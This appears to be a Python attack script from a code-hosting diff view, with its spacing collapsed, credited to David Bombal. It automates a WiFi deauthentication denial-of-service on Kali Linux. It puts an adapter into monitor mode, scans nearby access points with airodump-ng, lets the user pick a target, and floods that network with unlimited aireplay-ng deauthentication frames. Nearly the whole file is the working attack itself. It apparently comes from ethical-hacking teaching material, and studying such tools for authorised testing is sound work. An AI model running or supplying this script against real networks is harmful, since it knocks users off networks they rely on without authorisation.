|
| 1 | +# We will be using the subprocess module to run commands on Kali Linux. |
| 2 | +importsubprocess |
| 3 | +# We will require regular expressions. |
| 4 | +importre |
| 5 | +# We want to open the CSV files generated by airmon-ng, and we'll use the built-in csv module. |
| 6 | +importcsv |
| 7 | +# We want to import os because we want to check for sudo |
| 8 | +importos |
| 9 | +# We want to use time.sleep() |
| 10 | +importtime |
| 11 | +# We want to move .csv files in the folder if we found any. We'll use shutil for that. |
| 12 | +importshutil |
| 13 | +# Create a timestamp for .csv filename |
| 14 | +fromdatetimeimportdatetime |
| 15 | + |
| 16 | +# We declare an empty list where all active wireless networks will be saved to. |
| 17 | +active_wireless_networks= [] |
| 18 | + |
| 19 | +# We use this function to test if the ESSID is already in the list file. |
| 20 | +# If so we return False so we don't add it again. |
| 21 | +# If it is not in the lst we return True which will instruct the elif |
| 22 | +# statement to add it to the lst. |
| 23 | +defcheck_for_essid(essid,lst): |
| 24 | +check_status=True |
| 25 | + |
| 26 | +# If no ESSIDs in list add the row |
| 27 | +iflen(lst)==0: |
| 28 | +returncheck_status |
| 29 | + |
| 30 | +# This will only run if there are wireless access points in the list. |
| 31 | +foriteminlst: |
| 32 | +# If True don't add to list. False will add it to list |
| 33 | +ifessidinitem["ESSID"]: |
| 34 | +check_status=False |
| 35 | + |
| 36 | +returncheck_status |
| 37 | + |
| 38 | +# Basic user interface header |
| 39 | +print(r"""______ _ _ ______ _ _ |
| 40 | +| _ \ (_) | | | ___ \ | | | | |
| 41 | +| | | |__ ___ ___ __| | | |_/ / ___ _ __ ___ | |__ __ _| | |
| 42 | +| | | / _` \ \ / / |/ _` | | ___ \/ _ \| '_ ` _ \| '_ \ / _` | | |
| 43 | +| |/ / (_| |\ V /| | (_| | | |_/ / (_) | | | | | | |_) | (_| | | |
| 44 | +|___/ \__,_| \_/ |_|\__,_| \____/ \___/|_| |_| |_|_.__/ \__,_|_|""") |
| 45 | +print("\n****************************************************************") |
| 46 | +print("\n* Copyright of David Bombal, 2021 *") |
| 47 | +print("\n* https://www.davidbombal.com *") |
| 48 | +print("\n* https://www.youtube.com/davidbombal *") |
| 49 | +print("\n****************************************************************") |
| 50 | + |
| 51 | + |
| 52 | +# If the user doesn't run the program with super user privileges, don't allow them to continue. |
| 53 | +ifnot'SUDO_UID'inos.environ.keys(): |
| 54 | +print("Try running this program with sudo.") |
| 55 | +exit() |
| 56 | + |
| 57 | +# Move all .csv files in the directory to a backup folder. |
| 58 | +forfile_nameinos.listdir(): |
| 59 | +# We should only have one csv file as we delete them from the folder every time we run the program. |
| 60 | +if".csv"infile_name: |
| 61 | +print("There shouldn't be any .csv files in your directory. We found .csv files in your directory.") |
| 62 | +# We get the current working directory. |
| 63 | +directory=os.getcwd() |
| 64 | +try: |
| 65 | +# We make a new directory called /backup |
| 66 | +os.mkdir(directory+"/backup/") |
| 67 | +except: |
| 68 | +print("Backup folder exists.") |
| 69 | +# Create a timestamp |
| 70 | +timestamp=datetime.now() |
| 71 | +# We copy any .csv files in the folder to the backup folder. |
| 72 | +shutil.move(file_name,directory+"/backup/"+str(timestamp)+"-"+file_name) |
| 73 | + |
| 74 | +# Regex to find wireless interfaces, we're making the assumption they will all be wlan0 or higher. |
| 75 | +wlan_pattern=re.compile("^wlan[0-9]+") |
| 76 | + |
| 77 | +# Python allows is to run system commands by using a function provided by the subprocess module. |
| 78 | +# subprocess.run(<list of command line arguments goes here>, <specify if you want the capture_output to be True>) |
| 79 | +# We want to capture the output. The output will be in standard UTF-8 and will decode it. |
| 80 | +# The script is the parent process and creates a child process which runs the system command, and will only continue once the child process has completed. |
| 81 | +# We run the iwconfig command to look for wireless interfaces. |
| 82 | +check_wifi_result=wlan_pattern.findall(subprocess.run(["iwconfig"],capture_output=True).stdout.decode()) |
| 83 | + |
| 84 | +# No WiFi Adapter connected. |
| 85 | +iflen(check_wifi_result)==0: |
| 86 | +print("Please connect a WiFi controller and try again.") |
| 87 | +exit() |
| 88 | + |
| 89 | +# Menu to select WiFi interface from |
| 90 | +print("The following WiFi interfaces are available:") |
| 91 | +forindex,iteminenumerate(check_wifi_result): |
| 92 | +print(f"{index} -{item}") |
| 93 | + |
| 94 | +# Ensure the WiFi interface selected is valid. Simple menu with interfaces to select from. |
| 95 | +whileTrue: |
| 96 | +wifi_interface_choice=input("Please select the interface you want to use for the attack: ") |
| 97 | +try: |
| 98 | +ifcheck_wifi_result[int(wifi_interface_choice)]: |
| 99 | +break |
| 100 | +except: |
| 101 | +print("Please enter a number that corresponds with the choices.") |
| 102 | + |
| 103 | +# For easy reference we call the picked interface hacknic |
| 104 | +hacknic=check_wifi_result[int(wifi_interface_choice)] |
| 105 | + |
| 106 | +# Kill conflicting WiFi processses |
| 107 | +print("WiFi adapter connected!\nNow let's kill conflicting processes:") |
| 108 | + |
| 109 | +# subprocess.run(<list of command line arguments goes here>) |
| 110 | +# The script is the parent process and creates a child process which runs the system command, and will only continue once the child process has completed. |
| 111 | +# We run the iwconfig command to look for wireless interfaces. |
| 112 | +# Killing all conflicting processes using airmon-ng |
| 113 | +kill_confilict_processes=subprocess.run(["sudo","airmon-ng","check","kill"]) |
| 114 | + |
| 115 | +# Put wireless in Monitored mode |
| 116 | +print("Putting Wifi adapter into monitored mode:") |
| 117 | +put_in_monitored_mode=subprocess.run(["sudo","airmon-ng","start",hacknic]) |
| 118 | + |
| 119 | +# subprocess.Popen(<list of command line arguments goes here>) |
| 120 | +# The Popen method opens a pipe from a command. The output is an open file that can be accessed by other programs. |
| 121 | +# We run the iwconfig command to look for wireless interfaces. |
| 122 | +# Discover access points |
| 123 | +discover_access_points=subprocess.Popen(["sudo","airodump-ng","-w" ,"file","--write-interval","1","--output-format","csv",check_wifi_result[0]+"mon"],stdout=subprocess.DEVNULL,stderr=subprocess.DEVNULL) |
| 124 | + |
| 125 | +# Loop that shows the wireless access points. We use a try except block and we will quit the loop by pressing ctrl-c. |
| 126 | +try: |
| 127 | +whileTrue: |
| 128 | +# We want to clear the screen before we print the network interfaces. |
| 129 | +subprocess.call("clear",shell=True) |
| 130 | +forfile_nameinos.listdir(): |
| 131 | +# We should only have one csv file as we backup all previous csv files from the folder every time we run the program. |
| 132 | +# The following list contains the field names for the csv entries. |
| 133 | +fieldnames= ['BSSID','First_time_seen','Last_time_seen','channel','Speed','Privacy','Cipher','Authentication','Power','beacons','IV','LAN_IP','ID_length','ESSID','Key'] |
| 134 | +if".csv"infile_name: |
| 135 | +withopen(file_name)ascsv_h: |
| 136 | +# We use the DictReader method and tell it to take the csv_h contents and then apply the dictionary with the fieldnames we specified above. |
| 137 | +# This creates a list of dictionaries with the keys as specified in the fieldnames. |
| 138 | +csv_h.seek(0) |
| 139 | +csv_reader=csv.DictReader(csv_h,fieldnames=fieldnames) |
| 140 | +forrowincsv_reader: |
| 141 | +ifrow["BSSID"]=="BSSID": |
| 142 | +pass |
| 143 | +elifrow["BSSID"]=="Station MAC": |
| 144 | +break |
| 145 | +elifcheck_for_essid(row["ESSID"],active_wireless_networks): |
| 146 | +active_wireless_networks.append(row) |
| 147 | + |
| 148 | +print("Scanning. Press Ctrl+C when you want to select which wireless network you want to attack.\n") |
| 149 | +print("No |\tBSSID |\tChannel|\tESSID |") |
| 150 | +print("___|\t___________________|\t_______|\t______________________________|") |
| 151 | +forindex,iteminenumerate(active_wireless_networks): |
| 152 | +# We're using the print statement with an f-string. |
| 153 | +# F-strings are a more intuitive way to include variables when printing strings, |
| 154 | +# rather than ugly concatenations. |
| 155 | +print(f"{index}\t{item['BSSID']}\t{item['channel'].strip()}\t\t{item['ESSID']}") |
| 156 | +# We make the script sleep for 1 second before loading the updated list. |
| 157 | +time.sleep(1) |
| 158 | + |
| 159 | +exceptKeyboardInterrupt: |
| 160 | +print("\nReady to make choice.") |
| 161 | + |
| 162 | +# Ensure that the input choice is valid. |
| 163 | +whileTrue: |
| 164 | +choice=input("Please select a choice from above: ") |
| 165 | +try: |
| 166 | +ifactive_wireless_networks[int(choice)]: |
| 167 | +break |
| 168 | +except: |
| 169 | +print("Please try again.") |
| 170 | + |
| 171 | +# To make it easier to work with we assign the results to variables. |
| 172 | +hackbssid=active_wireless_networks[int(choice)]["BSSID"] |
| 173 | +hackchannel=active_wireless_networks[int(choice)]["channel"].strip() |
| 174 | + |
| 175 | +# Change to the channel we want to perform the DOS attack on. |
| 176 | +# Monitoring takes place on a different channel and we need to set it to that channel. |
| 177 | +subprocess.run(["airmon-ng","start",hacknic+"mon",hackchannel]) |
| 178 | + |
| 179 | +# Deauthenticate clients. We run it with Popen and we send the output to subprocess.DEVNULL and the errors to subprocess.DEVNULL. We will thus run deauthenticate in the background. |
| 180 | +subprocess.Popen(["aireplay-ng","--deauth","0","-a",hackbssid,check_wifi_result[int(wifi_interface_choice)]+"mon"],stdout=subprocess.DEVNULL,stderr=subprocess.DEVNULL) |
| 181 | + |
| 182 | +# We run an infinite loop which you can quit by presses ctrl-c. The deauthentication will stop when we stop the script. |
| 183 | +try: |
| 184 | +whileTrue: |
| 185 | +print("Deauthenticating clients, press ctrl-c to stop") |
| 186 | +exceptKeyboardInterrupt: |
| 187 | +print("Stop monitoring mode") |
| 188 | +# We run a subprocess.run command where we stop monitoring mode on the network adapter. |
| 189 | +subprocess.run(["airmon-ng","stop",hacknic+"mon"]) |
| 190 | +print("Thank you! Exiting now") |
| 191 | + |
| 192 | + |
| 193 | + |